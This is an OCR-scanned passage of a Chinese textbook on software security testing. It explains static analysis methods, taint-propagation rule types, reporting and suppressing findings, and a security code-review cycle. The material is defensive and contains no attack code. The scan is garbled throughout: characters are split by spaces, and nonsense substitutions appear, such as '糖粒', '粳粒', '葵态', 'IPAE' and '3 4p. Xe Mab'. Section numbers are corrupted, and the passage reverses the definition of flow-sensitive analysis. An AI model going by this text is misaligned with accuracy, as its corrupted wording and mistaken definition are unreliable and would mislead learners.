1) 抽象 解释 : 是 一 种 通用 技术 ， 这 种 方法 首先 将 程序 中 与 所 关注 的 属性 无 关 的 信息 抽 
取出 去 ， 而 后 使 用 选中 的 程序 抽象 执行 一 种 解释 。 由 循环 带 来 的 问题 可 通过 执行 一 种 流 敏感 
分 析 来 加 以 解决 ， 这 种 分 析 没有 考虑 所 执行 语句 的 顺序 。 从 程序 员 角度 看 ， 这 可 能 看 起 来 是 
一 种 相当 极端 的 方法 ， 语 句 在 程序 中 呈现 的 顺序 是 非常 重要 的 。 不 过 ， 流 敏感 的 分 析 保证 所 
有 语句 排序 方法 都 经 过 考虑 ， 这 为 考虑 到 所 有 可 行 的 语句 执行 顺序 提供 了 保障 。 这 种 方法 排 
除了 对 复杂 的 控制 流 分 析 的 需要 ,但 其 代价 是 许多 不 可 能 的 语句 执行 顺序 可 能 也 会 进行 分 析 。 
那些 致力 于 控制 误 报 的 工具 通常 至 少 会 部 分 尝试 使 用 流 敏感 的 分 析 ， 以 便 不 会 报告 那些 当 程 
序 运行 时 几乎 永远 不 会 发 生 的 语句 顺序 所 带 来 的 问题 。 

2) 谓词 转换 器 : 一 种 用 来 丛 换 模拟 和 解释 的 方法 是 导出 函数 对 其 调用 者 的 需求 。 Dijkstra 
引入 了 一 种 最 弱 前 置 条 件 的 概念 ， 这 个 概念 源 自 一 个 使 用 谓词 转换 器 的 程序 。 程 序 的 最 弱 前 
置 条 件 是 对 程序 调用 者 的 一 组 最 少 的 需求 ， 这 些 需 求 是 实现 最 终 状态 所 必需 的 。 程 序 中 的 语 
句 可 以 视 为 是 对 后 置 条 件 执行 转换 。 从 程序 中 的 最 后 一 条 语句 开始 倒退 处 理 到 第 一 条 语句 ， 
程序 所 需 的 后 置 条 件 被 转换 为 该 程序 要 成 功 实现 所 需 的 前 置 需 求 。 

3) 模型 检查 :对 于 临时 性 的 安全 属性 ， 比 如 “内 存 应 该 只 释放 一 次 ”以 及 “应 该 只 有 
非 空 指针 才能 被 解除 引用 ”， 可 以 很 容易 地 将 所 检查 的 属性 表示 为 一 个 小 型 的 有 限 状态 自动 
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机 。 模 型 检查 方法 将 此 属性 当成 一 种 规范 ， 同 时 将 待 检查 程序 转换 为 一 种 模型 ， 此 后 对 比 上 
述 规范 与 模型 。 
3. 全 局 分 析 


全 局 分 析 的 作用 是 用 来 分 析 程 序 中 各 个 函数 之 间 的 关系 。 它 是 一 种 封闭 式 环境 下 的 假 
设 ， 即 对 整个 程序 进行 检测 。 全 局 分 析 被 采用 的 实质 原因 有 两 个 方面 : 首先 ， 它 可 以 保证 汇 
编 系 统 的 一 致 性 ， 其 次 ， 它 通过 提供 自动 优化 ， 减 轻 了 程序 员 的 负担 。 

它 的 做 法 如 下 : 将 整个 系统 按 可 重用 的 程度 划分 为 若干 个 不 同 的 基本 包 。 它 表示 了 系统 
的 大 的 逻辑 框架 ， 然 后 测试 包 与 包 之 间 的 联系 的 安全 性 。 


4.2.3 ”规则 


这 里 的 规则 是 指 安全 工具 应 该 报告 的 内 容 的 规则 集 。 分 析 算 法 有 时 可 能 由 错误 的 “ 因 ” 
获得 正确 的 “ 果 ” 但 分 析 工 具 永远 也 不 会 报告 超出 规则 集 范围 的 问题 。 

早期 的 安全 工具 有 时 会 通过 计算 每 个 工具 默认 情况 下 打包 进来 的 规则 数量 ,对 工具 进行 
简单 比较 。 最 近 的 静态 分 析 工 具 就 更 难 比 较 了 。 多 个 规则 可 能 会 一 起 用 来 检测 一 个 问题 ， 而 
单条 规则 可 能 会 指出 抽象 接口 或 者 根据 正则 表达 式 来 匹配 方法 名 称 。 就 像 代 码 更 多 并 不 总 是 
能 带 来 更 好 的 程序 一 样 ， 更 多 数量 的 规则 并 不 总 是 带 来 更 好 的 静态 分 析 工 具 。 

代码 质量 工具 有 时 会 从 其 分 析 的 代码 来 推断 规则 。 如 果 某 个 程序 在 100 个 不 同 的 位 置 调 
用 同一 个 方法 , 而 在 其 中 99 个 位 置 该 程序 都 注意 了 该 方法 的 返回 值 , 但 仍 会 有 相当 大 的 机 会 
在 那个 剩 下 的 位 置 中 没有 检查 返回 值 。 因 此 ， 这 种 统计 方法 来 推断 规则 并 不 能 很 好 地 适用 于 
对 安全 问题 的 识别 。 如 果 程 序 员 不 了 解 某 种 具体 构造 所 代表 的 安全 风险 ， 那 么 其 代码 可 能 就 
会 在 整个 程序 中 一 律 使 用 这 种 错误 构造 ， 如 果 只 给 出 统计 方法 的 话 ， 这 种 情况 会 造成 100% 
的 漏 报 率 。 

规则 不 仅 用 于 定义 安全 属性 ， 也 会 定义 那些 在 程序 文本 中 未 明确 包含 的 程序 行为 ， 如 该 
程序 使 用 的 任何 系统 或 第 三 方 库 的 行为 。 为 系统 库 和 流行 的 第 三 方 库 创建 并 维护 一 个 优秀 的 
建 模 规则 集合 是 一 项 巨大 的 工作 。 

1. 规则 格式 


在 程序 外 部 实现 检查 代码 所 需 的 规则 是 每 一 个 好 的 静态 分 析 工 具 都 会 尽力 实现 的 功能 ， 
因为 如 果实 现 了 该 功能 ， 就 能 在 无 须 更 改 工 具 本 身 的 情况 下 修改 、 添 加 或 者 减少 规则 。 最 好 
的 静态 分 析 工 具 会 将 所 有 要 检查 的 规则 都 放 在 外 部 实现 。 除 了 调整 外 部 工具 的 行为 外 ， 外 部 
规则 接口 还 需要 最 终 让 用 户 添加 检查 规则 来 适应 新 类 型 ， 或 者 以 分 析 程 序 语义 的 方式 扩展 现 
有 的 检查 规则 。 

专用 的 规则 文件 : 在 维护 一 份 外 部 文件 时 ， 在 其 中 使 用 一 种 专门 格式 的 描述 规则 ;， 这样 
做 ， 将 允许 针对 分 析 引 擎 的 能 力 来 定制 规则 的 格式 。 

批注 ; 有 时 ， 以 批注 形式 将 规则 附 在 程序 文本 中 会 收 到 更 好 的 效果 。 如 果 某 些 专门 的 规 
则 决定 着 某 个 具体 模块 的 使 用 ， 将 这 些 规则 直接 放 在 此 模块 中 (或 放 在 此 模块 的 头 文件 中 ) 是 
一 种 不 错 的 方式 ， 通 过 这 种 方式 ， 可 确保 在 此 模块 使 用 时 应 用 这 些 规则 。 批 注 的 上 下 文 环境 
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从 其 周围 的 代码 便 可 看 出 ， 因 此 ， 它 常 比 以 外 部 文件 形式 存在 的 规则 更 简短 。 例 如 ， 批 注 无 
须 详细 说 明 某 个 函数 的 名 字 ， 只 要 在 此 函数 声明 之 前 出 现 即 可 。 
2. 用 于 污染 传播 的 规则 


使 用 静态 分 析 解 决 污染 传播 问题 需要 各 种 不 同 的 规则 类 型 。 由 于 很 多 安全 问题 可 被 表示 
为 污染 传播 问题 ， 故 这 里 简要 概括 一 下 各 种 污染 传播 规则 的 类 型 : 

。 源 规则 定义 了 受 污染 的 数据 进入 系统 的 程序 位 置 。 

。 接收 器 规则 定义 了 不 应 该 接受 受 污染 数据 的 程序 位 置 。 

。 传递 规则 定义 了 函数 操纵 受 污染 数据 的 方式 。 

e 净化 规则 是 传递 规则 的 一 种 形式 ， 用 于 从 一 个 变量 中 移 除 污染 。 净 化 规则 用 于 表示 

输入 验证 函数 。 

e 入 口 点 规则 与 源 规则 类 似 ， 在 这 里 ， 将 污染 引入 程序 中 ， 但 入 口 点 规则 不 是 在 程序 

中 函数 调用 的 位 置 引入 污染 ， 而 是 由 攻击 者 调用 函数 时 引入 污染 。 

在 最 简单 的 形式 中 ， 污 染 是 一 段 数 据 的 一 个 双 态 属性 ， 其 值 要 么 是 已 污染 ， 要 么 是 未 污 
染 。 实 际 上 ， 输 入 法 验证 问题 并 非 这 样 泾 渭 分 明 。 输 入 会 由 于 某 些 意图 而 受到 信任 ， 也 会 由 
于 其 他 原因 而 不 被 信任 。 为 表示 这 样 一 种 事实 ， 可 将 各 种 受 污染 的 数据 作为 各 种 污染 的 载体 
来 建 模 。 污 染 标记 可 用 各 种 方式 来 应 用 。 

首先 ， 不 同 的 源 规则 会 引入 带 有 不 同 污染 标记 的 数据 。 来 自 网 络 的 数据 可 能 被 标记 为 
FROM NETWORK， 而 来 自 一 个 配置 文件 的 数据 可 能 被 标记 为 FROM _CONFIGURAIION。 
如 果 这 些 污染 标记 能 带 入 到 静态 分 析 的 输出 中 ， 那 么 这 些 信息 将 允许 审计 人 员 根据 非 受信 数 
据 来 源 而 对 输出 进行 优先 级 排序 。 

其 次 ， 接 收 器 函数 只 有 在 带 有 某 种 污染 的 数据 到 达 时 才 是 危险 的 。 只 有 当 接 收 到 任意 可 
被 用 户 控制 的 数据 时 , 跨 站 点 脚本 执行 接收 器 才 是 存在 漏洞 的 , 而 如 果 只 收 到 数值 数据 的 话 ， 
就 不 会 有 漏洞 。 

源 规则 、 接 收 器 规则 以 及 传递 规则 会 以 一 种 追加 或 者 删 减 的 方式 来 操纵 污染 。 在 采用 删 
减 方式 的 情况 下 ， 源 规则 引入 的 数据 可 能 携带 所 有 需要 关注 的 污染 标记 。 给 定 其 所 执行 的 验 
证 类 型 ， 采 用 传递 规则 建 模 的 输入 验证 函数 会 去 除 适当 的 污染 标记 。 接 收 器 规则 会 基于 受 污 
染 数 据 来 检查 危险 的 操作 ， 或 者 ， 如 果 仍 然 存 在 那些 污染 标记 的 话 ， 接 收 器 规则 还 会 检查 那 
些 逃 脱 应 用 层 或 者 触发 器 检查 的 受 污染 数据 。 在 采用 追加 方式 的 情况 下 ， 源 规则 以 一 般 的 方 
式 引 入 受 污染 的 数据 ， 而 输入 验证 函数 基于 它们 所 执行 的 验证 类 型 来 追加 污染 标记 ， 验 证 跨 
站 点 脚本 执行 攻击 的 函数 会 追加 一 个 VALIDAITED XSS 标记 。 接 收 器 规则 扮演 着 和 采用 减 去 
方式 情况 时 一 样 的 角色 ， 当 在 一 个 不 带 有 适当 污染 标记 的 自 变量 参数 上 执行 危险 操作 时 ， 或 
者 在 数据 没有 必要 的 污染 标记 的 情况 下 离开 应 用 层 的 时 候 ， 会 触发 这 类 规则 。 


424 报告 结果 


大 多 数学 术 研究 工作 所 投资 的 静态 分 析 工 具 ， 都 将 精力 花 在 了 创造 新 方法 来 识别 缺陷 方 
面 。 但 是 ， 当 某 个 工具 真正 面临 着 投入 实际 使 用 的 时 候 ， 该 工具 报告 结果 的 方式 对 于 此 工具 
所 提供 的 价值 具有 重要 的 影响 。 静 态 分 析 工 具 的 用 户 倾向 于 使 用 术语 “ 误 报 ”来 指 那些 可 能 
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出 现在 标题 “ 非 期 望 的 结果 ”之 下 的 东西 。 尽 管 这 并 非 我 们 所 使 用 的 定义 ， 但 我 们 当然 理解 
这 种 倾向 。 从 用 户 角度 看 ， 并 不 关心 底层 分 析 算 法 的 品质 多 么 优良 。 如 果 你 不 能 理解 这 个 工 
具 告诉 了 你 什么 ， 这 个 结果 就 是 没有 用 的 。 从 这 种 意义 上 讲 ， 从 糖 粒 的 表示 法 中 可 以 很 容易 
地 产生 出 精 糙 的 结果 ， 就 如 同 从 分 析 错 误 中 产生 出 的 结果 一 样 粳 粒 。 

以 用 户 能 预测 结果 潜在 影响 的 方式 提供 结果 ， 这 是 分 析 工具 的 部 分 任务 。 像 跳 转 到 定义 
这 样 的 简单 代码 导航 功能 也 是 很 重要 的 。 如 果 一 个 静态 分 析 工 具 可 作为 程序 员 集成 开发 环境 
中 的 插件 来 运行 的 话 ， 对 每 个 人 都 有 好 处 ， 程 序 员 部 悉 代码 导航 设置 ， 而 静态 分 析 工 具 开发 
人 员 不 必 彻底 重 做 代码 浏览 功能 。 

审计 人 员 如 果 想 要 管理 工具 的 输出 ， 那 么 要 求 该 工具 至 少 具备 3 种 功能 : 

1) 将 所 报告 的 结果 进行 分 类 并 分 组 ; 

2) 消除 所 报告 的 结果 中 非 预 期 的 部 分 ; 

3) 对 所 报告 结果 的 意义 进行 解释 。 

1. 将 所 报告 的 结果 进行 分 类 并 分 组 


如 果 用 户 能 以 一 种 灵活 的 方式 对 所 报告 的 结果 进行 分 类 并 分 组 ， 那 么 ， 所 报告 结果 中 的 
大 量 非 预 期 成 分 通常 能 够 被 消除 ， 因 而 不 必 再 对 每 一 个 问题 逐一 进行 审查 。 例 如 ， 如 果 所 分 
析 的 程序 从 一 个 可 信 的 文件 中 获取 某 些 输入 ， 那 么 ， 用 户 将 可 通过 消除 那些 假定 此 文件 不 可 
信 的 条 件 下 所 产生 的 所 有 结果 ， 从 而 从 对 结果 的 审查 中 获 益 菲 浅 。 

由 于 静态 分 析 工 具 会 生成 大 量 结果 ， 而 如 果 这 些 结果 以 一 种 分 级 次 序 提供 ， 使 得 最 重要 
的 结果 最 可 能 出 现在 审查 的 初期 ， 将 更 有 益 于 用 户 的 分 析 。 葵 态 分 析 工具 有 两 种 将 结果 分 级 
的 维度 。 假 定 此 工具 不 会 犯错 ， 那 么 严重 性 将 给 出 所 发 现 问题 的 重要 性 。 例 如 ， 缓 冲 区 溢出 
通常 就 是 一 种 比 释放 空 指针 应 用 更 严重 的 安全 问题 。 可 信 度 给 出 了 一 种 对 所 找 出 问题 的 可 能 
性 进行 评价 的 标准 。 通 常情 况 下 ， 为 实现 某 个 结果 ， 工 具 必须 要 做 的 假定 越 多 ， 那 么 这 个 结 
果 的 可 信 度 就 越 低 。 要 创建 一 种 分 级 ， 分 析 工具 必须 对 每 个 结果 组 合 使 用 严重 性 和 可 信 度 得 
分 来 进行 判定 。 典 型 情况 下 ， 严 重 性 和 可 信 度 可 进一步 压缩 为 一 种 关于 重要 性 的 简单 的 非 连 
续 范围 ， 如 关键 (C)、 高 (D)、 中 (MWD 以 及 低 (L)。 这 为 审计 人 员 提 供 了 对 其 工作 进行 优先 级 排 
序 的 一 种 简便 方法 。 

2. 消除 所 报告 的 结果 中 非 预期 的 部 分 


对 非 预期 的 结果 进行 审查 令 人 不 感 兴趣 ， 而 对 同一 个 非 预期 的 结果 进行 多 次 审查 简直 让 
人 疲 备 不 堪 。 对 输出 结果 进行 抑制 是 任何 一 个 高 级 静态 分 析 工 具 必 备 的 机 制 ， 只 有 这 样 ， 已 
经 报告 过 的 问题 在 后 续 分 析 中 将 不 会 重复 进行 报告 。 如 果 这 个 系统 比较 好 的 话 ， 抑 制 信息 将 
会 带 到 将 来 由 同一 代码 库 生成 的 版 本 中 。 同 样 ， 审 计 人 员 也 应 该 能 够 共享 和 合并 抑制 信息 ， 
这 样 多 个 人 就 不 需要 对 同一 个 问题 进行 审计 。 

用 户 应 该 能 够 关闭 整个 属于 警告 的 类 别 ， 但 他 们 仍 需 逐 一 消除 错误 。 许 多 工具 都 允许 使 
用 编译 指示 或 者 代码 批注 来 抑制 结果 。 但 是 ， 如 果 执 行 代码 审查 的 人 没有 修改 代码 的 权限 
那么 就 需要 有 一 种 抑制 信息 在 代码 之 外 保存 的 方式 一 种 可 能 的 方法 就 是 仅 保存 代码 文件 名 、 
问题 所 在 的 行 号 以 及 问题 类 型 。 这 种 方法 的 问题 是 ， 即 使 是 对 文件 的 一 次 小 小 的 改动 ， 也 会 
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引起 所 有 行 号 的 偏 移 ， 从 而 会 使 所 保存 的 这 种 抑制 信息 失效 。 通 过 将 行 号 信息 保存 为 从 所 在 
函数 的 开始 位 置 的 偏 移 量 ， 或 者 是 从 最 近 标记 的 语句 开始 的 偏 移 量 ， 可 以 减轻 这 种 方法 存在 
的 问题 。 如 果 结果 中 包含 程序 中 跟踪 的 信息 而 不 仅 是 一 个 行 号 , 那么 第 二 种 方法 就 尤其 有 用 。 
这 种 方法 基于 组 成 结果 跟踪 轨迹 的 程序 构造 为 结果 生成 一 个 标识 符 ， 其 中 包括 函数 和 变量 的 
名 称 、 相 关 的 部 分 控制 流 图 以 及 与 确定 结果 有 关 的 所 有 规则 的 标识 符 。 

3. 对 所 报告 结果 的 意义 进行 解释 


人 工 测试 出 来 的 优秀 bug 报告 应 包括 问题 描述 、 关 于 此 问题 会 影响 到 谁 、 解 释 为 什么 它 
重要 以 及 要 再 现 此 问题 所 需 的 步骤 。 但 就 算是 优秀 的 bug 报告 有 时 也 会 送 回 标 有 “不 能 再 现 ” 
或 “不 是 问题 ”的 内 容 。 当 出 现 这 种 情况 时 ， 测 试 人 员 会 再 次 尝试 解释 这 种 情况 。 静 态 分 析 
工具 不 会 进行 再 次 尝试 ， 因 此 他 们 必须 在 第 一 次 的 时 候 就 做 出 一 种 有 效 的 论证 。 由 于 程序 员 
可 能 不 能 立即 理解 所 发 现 问题 的 安全 衍生 意义 。 这 种 情况 下 ， 发 现 出 来 的 这 种 问题 可 能 难以 
吸引 未 经 培训 者 的 眼球 ， 但 实际 上 却 会 很 容易 被 攻击 者 挖 气 出来。 因此， 静态 分 析 工 具 必须 
能 够 对 其 所 报告 结果 的 意义 进行 解释 并 对 潜在 的 安全 隐患 进行 预测 。 


43 ”代码 审查 中 的 静态 分 析 


从 上 面 的 章节 中 ， 我 们 已 经 知道 将 静态 分 析 工 具 作 为 安全 开发 过 程 的 一 部 分 来 使 用 。 相 
对 于 静态 分 析 工 具 , 辅助 进行 安全 审查 的 工具 在 工作 原理 和 作用 上 存在 着 根本 的 不 同 。 例 如 ， 
调试 器 不 要 求 落实 任何 组 织 范围 的 规划 。 作为 个 体 时 , 程序 员 可 以 在 需要 时 运行 这 个 调试 器 ， 
获得 结果 ， 并 继续 其 他 编程 任务 。 仅 仅 出 于 软件 安全 的 考虑 很 少 会 产生 急需 程序 员 运 行 调试 
器 的 情况 。 出 于 这 种 原因 ， 一 个 组 织 需要 有 一 个 计划 ， 规 定 谁 将 指导 安全 审查 ， 什 么 时 候 要 
进行 审查 以 及 如 何 基于 审查 结果 来 采取 行动 。 由 于 静态 分 析 工 具 可 显著 提高 安全 审查 过 程 的 
效率 , 故 应 将 静态 分 析 工 具 作为 这 个 计划 的 一 部 分 。 代码 审查 主要 完成 以 下 几 个 方面 的 检查 

1) 完整 性 检查 ;代码 是 否 完全 实现 了 设计 文档 中 提出 的 功能 需求 ， 代 码 是 否 已 按照 设 
计 文档 进行 了 集成 和 调试 ， 代码 是 否 已 创建 了 需要 的 数据 库 ， 包 括 正 确 的 初始 化 数据 ; 代码 
中 是 否 存在 任何 没有 定义 或 没有 引用 到 的 变量 、 常 数 或 数据 类 型 。 

2) 一 致 性 检查 :代码 的 逻辑 是 否 符 合 设 计 文档 ， 代 码 中 使 用 的 格式 、 符 号 、 结 构 等 风 
格 是 否 保持 一 致 。 

3) 正确 性 检查 : 代码 是 否 符合 制定 的 标准 ， 所 有 的 变量 都 被 正确 定义 和 使 用 ， 所 有 的 
注释 都 是 准确 的 ， 所 有 的 程序 调用 都 使 用 了 正确 的 参数 个 数 。 

4) 可 修改 性 检查 :代码 涉及 的 常量 是 否 易 于 修改 (如 使 用 配置 、 定 义 为 类 常量 、 使 用 专 
门 的 常量 类 等 ); 代码 中 是 否 包 含 了 交叉 说 明 或 数据 字典 ， 以 描述 程序 是 如 何 对 变量 和 常量 ; 
行 访问 的 ， 代 码 是 否 只 有 一 个 出 口 和 一 个 入 口 (严重 的 异常 处 理 除外 )。 

5) 可 预测 性 检查 : 代码 所 用 的 开发 语言 是 否 具有 定义 良好 的 语法 和 语义 ， 是 否 代码 避 
兔 了 依赖 于 开发 语言 默认 提供 的 功能 ， 代 码 是 否 无 意 中 陷入 了 死 循环 ， 代 码 是 否 避 免 了 无 穷 
递归 。 


“114。 软件 安全 测试 及 工具 应 用 (第 2 版 ) 


6) 健壮 性 检查 : 代码 是 否 采 取 措 施 避 免 运 行 时 错误 (如 数组 边界 溢出 、 被 零 除 、 值 越界 、 
堆栈 溢出 等 )。 

7) 结构 性 检查 : 程序 的 每 个 功能 是 否 都 作为 一 个 可 辩 识 的 代码 块 存在 ;循环 是 否 只 有 
IPAE: 

8) 可 追溯 性 检查 ; 代码 是 否 对 每 个 程序 进行 了 唯一 标识 ; 是 否 有 一 个 交叉 引用 的 框架 
可 以 用 来 在 代码 和 开发 文档 之 间 相 互 对 应 ;代码 是 否 包 括 一 个 修订 历史 记录 ， 记 录 中 对 代码 
的 修改 和 原因 都 有 记录 ; 是 否 所 有 的 安全 功能 都 有 标识 。 

9) 可 理解 性 检查 ; 注释 是 否 足够 清晰 地 描述 每 个 子 程序 ;是 否 使 用 到 不 明确 或 不 必要 
的 复杂 代码 ， 它 们 是 否 被 清楚 地 注释 ， 使 用 一 些 统一 的 格式 化 技巧 (如 缩 进 、 空 白 等) 用 来 增 
强 代码 的 清晰 度 ， 是 否 在 定义 命名 规则 时 采用 了 便于 记忆 ， 反 映 类 型 等 方法 ， 每 个 变量 都 定 
义 了 合法 的 取 值 范围 ， 代 码 中 的 算法 是 否 符合 开发 文档 中 描述 的 数学 模型 。 

10) 可 验证 性 检查 : 代码 中 的 实现 技术 是 否 便于 测试 。 

接 下 来 我 们 详细 分 析 代 码 安全 审查 的 过 程 和 内 容 。 


434 执行 代码 安全 审查 


之 所 以 要 开展 以 安全 为 中 心 的 代码 审查 ， 有 多 种 原因 : 
e 某 些 审查 人 员 的 出 发 点 是 需要 找 出 一 些 可 利用 的 漏洞 ， 用 于 证 明 在 安全 方面 额外 投 
资 的 正确 性 。 
。 对 于 每 个 开始 时 没有 安全 意识 的 大 型 项 目 ， 开 发 团队 最 终 不 得 不 回 过 头 来 重新 检查 
- 遍 代 码 以 进行 安全 方面 的 改进 。 
。 每 个 项 目 至 少 在 每 次 新 版 本 发 布 期 间 要 接受 一 次 安全 审查 ， 以 充分 考虑 要 新 增 的 功 
能 特性 和 正在 进行 的 维护 工作 。 
在 这 3 4p. Xe Mab, 第 2 条 要 求 付 出 的 时 间 和 精力 是 最 多 的 。 改 进 一 个 编写 时 未 考 
虑 安全 的 程序 将 是 一 项 工作 量 相当 大 的 任务 。 对 同一 段 代 码 ， 后 续 审查 会 相对 容易 一 些 。 最 
初 的 审查 很 可 能 会 找 出 许多 需要 解决 的 问题 。 后 续 的 审查 发 现 的 问题 应 该 会 相对 少 些 ， 这 是 
因为 程序 员 会 在 一 个 更 健壮 的 基础 上 构建 程序 。 
1. 代码 审查 周期 


首先 ， 我 们 来 概要 地 看 一 下 代码 审查 周期 ， 然 后 详细 对 每 个 阶段 进行 讨论 。 在 这 个 周期 
中 有 4 个 主要 的 阶段 : 


1) 确立 目标 

一 组 定义 完善 的 安全 目标 将 有 助 于 对 应 该 被 审查 的 代码 以 及 应 该 用 于 审查 这 些 代 码 的 
准则 进行 优先 级 排序 。 这 些 目标 应 该 来 自 于 你 所 面 对 的 软件 风险 的 评估 。 我 们 常常 会 听 到 一 
些 关于 高 级 目标 的 笼统 说 法 : 

。 “如 果 能 通过 Intemet 访问 到 它 ， 那 么 必须 在 其 发 布 之 前 对 其 进行 审查 。” 

。 “如 果 它 将 处 理 钱 的 问题 ， 那 么 必须 至 少 每 年 对 其 审查 一 次 。” 

我 们 在 和 人 聊天 的 时 候 也 会 了 解 到 一 些 人 有 更 具体 的 战斗 性 目标 。 一 个 短期 的 关注 点 可 
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能 来 自 于 以 下 某 个 声明 

。 “我 们 不 能 在 下 次 的 一 致 性 审计 中 出 问题 。 要 确保 审计 员 给 我 们 提供 的 是 一 张 干净 

健康 的 清单 。” 

。 “我 们 要 结束 各 种 跨 站 点 执行 脚本 漏洞 的 困扰 。” 

上 面 对 高 级 目标 的 描述 非常 笼统 ,我们 需要 有 高 级 指导 来 对 代码 审查 目标 进行 优先 级 排 
序 。 在 确定 高 级 指导 时 ， 我 们 不 仅 要 明确 为 什么 进行 代码 审查 ， 不 能 盲目 地 随波逐流 ， 还 要 
了 解 所 审查 代码 的 功能 和 用 途 。 因 为 在 解 代码 的 功能 和 用 途 的 基础 上 去 审查 代码 ， 很 容易 判 
定 什么 是 可 以 接受 的 ， 什 么 是 不 可 以 接受 的 。 


2) 运行 静态 分 析 工 具 

确定 了 审查 目标 ， 我 们 就 可 以 开始 运行 静态 分 析 工 具 了 。 要 开始 这 个 过 程 ， 需 要 收集 目 
标 代 码 ， 对 工具 进行 配置 以 报告 那些 带 来 最 大 风险 的 问题 ， 而 后 禁用 无 关 的 检查 。 本 阶段 的 
输出 将 作为 在 代码 审查 期 间 使 用 的 一 组 原始 结果 。 

在 运行 静态 分 析 工 具 时 ， 还 应 该 添加 自 定义 的 规则 ， 从 而 检测 专门 针对 所 分 析 程序 的 错 
误 。 如 果 你 的 组 织 有 一 套 安全 编码 指导 原则 ， 仔 细 检 查 这 些 原则 ， 并 找 出 可 作为 自 定 义 规则 
进行 编码 的 那些 条 目 。 默 认 状况 下 ， 静 态 分 析 工 具 不 会 知道 代码 所 处 的 上 下 文 环境 中 ， 什 么 
会 构成 安全 违规 。 通 过 根据 实际 环境 而 对 工具 进行 定制 ， 将 获得 很 好 的 机 会 来 极 大 地 提高 该 
工具 所 得 出 结果 的 质量 。 

手工 代码 审查 过 程 中 发 现 的 错误 在 这 里 也 特别 有 用 。 如 果 之 前 识别 出 的 错误 能 表述 为 违 
反 了 某 种 程序 不 变 式 ， 那 么 就 可 以 编写 一 个 规则 来 检测 类 似 的 情况 。 将 这 些 规则 累积 起 来 形 
成 一 个 规则 集 ， 作 为 一 种 制度 上 的 备 忘 形式 ， 从 而 防止 前 面 出 现 的 安全 失误 重复 出 现 。 


3) 审查 代码 (使 用 静态 分 析 工 具 的 输出 ) 

运行 静态 分 析 工 具 完 成 代码 安全 分 析 ， 就 可 以 开始 进行 代码 审查 了 。 仔 细 检 查 静 态 分 析 
结果 ， 但 不 要 将 自己 局 限于 仅仅 是 分 析 结 果 。 要 让 分 析 工 具 发 现 潜在 的 问题 ， 但 不 要 被 它 在 
其 他 问题 上 误导 ， 而 这 些 问题 原本 可 以 通过 自己 对 代码 的 检查 来 发 现 。 我 们 通常 可 以 找 出 与 
分 析 工具 所 报告 问题 相关 的 其 他 bug。 这 种 “邻近 效应 ” 源 于 这 样 的 事实 ， 即 静态 分 析 工 具 
经 常会 在 敏感 操作 附近 感到 困惑 ， 这 时 就 会 报告 一 个 问题 。 尽 管 可 能 原因 不 尽 相同 ， 但 能 让 
工具 产生 困惑 的 代码 往往 也 会 让 程序 员 觉 得 困惑 。 仔 细 检 查 所 有 静态 分 析 结 果 ， 不 要 仅 停 留 
在 高 优先 级 的 警告 。 如 果 结 果 清 单 比较 长 ， 将 其 分 割 ， 这 样 可 以 由 多 个 审查 人 员 共同 来 完 
这 项 工作 。 对 单一 问题 进行 审查 是 对 工具 报告 这 个 问题 时 所 做 的 假设 进行 验证 。 采 取 缓 解 措 
施 能 够 防止 这 段 代 码 出 现 漏洞 吗 ? 非 受信 数据 源 是 否 确实 不 可 信 ? 由 工具 假设 的 情景 实际 上 
是 否 切 实 可 行 ? 如 果 我 们 正在 审查 其 他 人 的 代码 ， 则 不 能 够 回答 所 有 这 些 问题 ， 而 应 该 与 代 
码 的 作者 或 所 有 者 合作 。 某 些 静态 分 析 工 具 会 让 结果 的 共享 非常 容易 ， 这 将 简化 这 个 过 程 。 

协力 完成 的 审计 是 一 种 对 等 审查 的 形式 ， 结 构 化 的 对 等 审查 是 一 种 经 过 证 明 的 技术 ， 可 
用 于 识别 所 有 类 型 的 缺陷 。 这 里 的 对 等 检查 就 是 代码 评审 中 的 “同行 评审 "， 在 执行 关注 安全 
的 对 等 检查 时 ， 最 好 在 审查 团队 中 有 一 个 安全 专家 确定 我 们 审查 的 方案 和 结果 ， 同 时 还 需要 
一 位 审查 人 员 来 负责 仔细 检查 工具 的 输出 。 
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代码 审查 结果 可 采取 许多 种 形式 : 输入 到 数据 库 中 的 bug、 适 合 程序 员 和 管理 目的 使 
的 一 份 形式 化 报告 、 软 件 安全 跟踪 系统 中 的 条 目 或 是 一 份 送 给 程序 员 的 非 正式 任务 清单 。 无 
论 其 形式 是 什么 ， 都 要 确保 能 够 得 到 永久 保存 ， 以 便 在 下 一 次 代码 审查 期 间 可 以 使 用 这 些 结 
果 。 对 每 个 问题 的 反馈 应 该 包含 一 份 对 问题 的 详细 解释 、 一 份 对 该 问题 所 带 来 的 风险 的 评估 
以 及 相关 部 分 的 安全 策略 和 风险 评估 文档 参考 。 这 种 对 审查 结果 的 持久 收集 还 适用 于 另 一 种 
用 途 ， 即 作为 安全 培训 的 信息 。 我 们 可 以 使 用 审查 结果 将 培训 聚焦 于 与 代码 紧密 相关 的 那些 
实际 问题 和 话题 。 

4) 进行 修补 

有 两 种 因素 在 左右 程序 员 对 来 自 安 全 审查 反馈 的 态度 : 

。 安全 是 他 们 的 事情 吗 ? 如 果 做 好 安全 是 发 布 他 们 代码 的 先决 条 件 ， 那 么 安全 就 是 他 

们 的 事情 。 不 这 样 的 话 安全 就 无 法 贯彻 ， 因 为 这 项 工作 和 添加 新 功能 、 打 补丁 以 及 
按时 将 代码 发 布 之 类 的 工作 是 竞争 性 的 ， 做 了 这 个 ， 其 他 的 就 会 受到 影响 。 

e 他 们 理解 这 份 反馈 吗 ?理解 安全 问题 需要 进行 安全 培训 。 此 外 ， 还 需要 将 这 种 反馈 

以 一 种 能 被 理解 的 方式 来 编写 。 源 自 代 码 审查 的 结果 不 像 故 障 测试 用 例 那 样 具体 ， 
所 以 此 结果 需要 对 所 涉及 的 风险 给 出 更 完整 的 解释 。 

在 开发 生命 周期 中 ， 如 果 安 全 审查 开展 得 足够 早 的 话 ， 那 么 这 时 就 应 该 对 来 自 安全 审查 
的 反馈 进行 响应 。 是 不 是 围绕 某 个 具体 的 模块 或 者 某 个 具体 的 功能 而 出 现 大 堆 的 问题 呢 ? 如 
果 是 的 话 ， 这 时 候 就 应 该 回溯 并 查找 设计 相关 的 问题 ， 这 样 可 以 减轻 这 些 问题 的 严重 性 。 如 
果 没 有 这 种 情况 ， 通 过 额外 安全 培训 的 形式 ， 问 题 得 到 了 最 好 、 最 持久 的 解决 。 

当 程序 员 解决 了 审查 所 识别 出 的 问题 时 ， 相 应 的 修复 必须 进行 检验 。 所 采取 的 验证 形式 
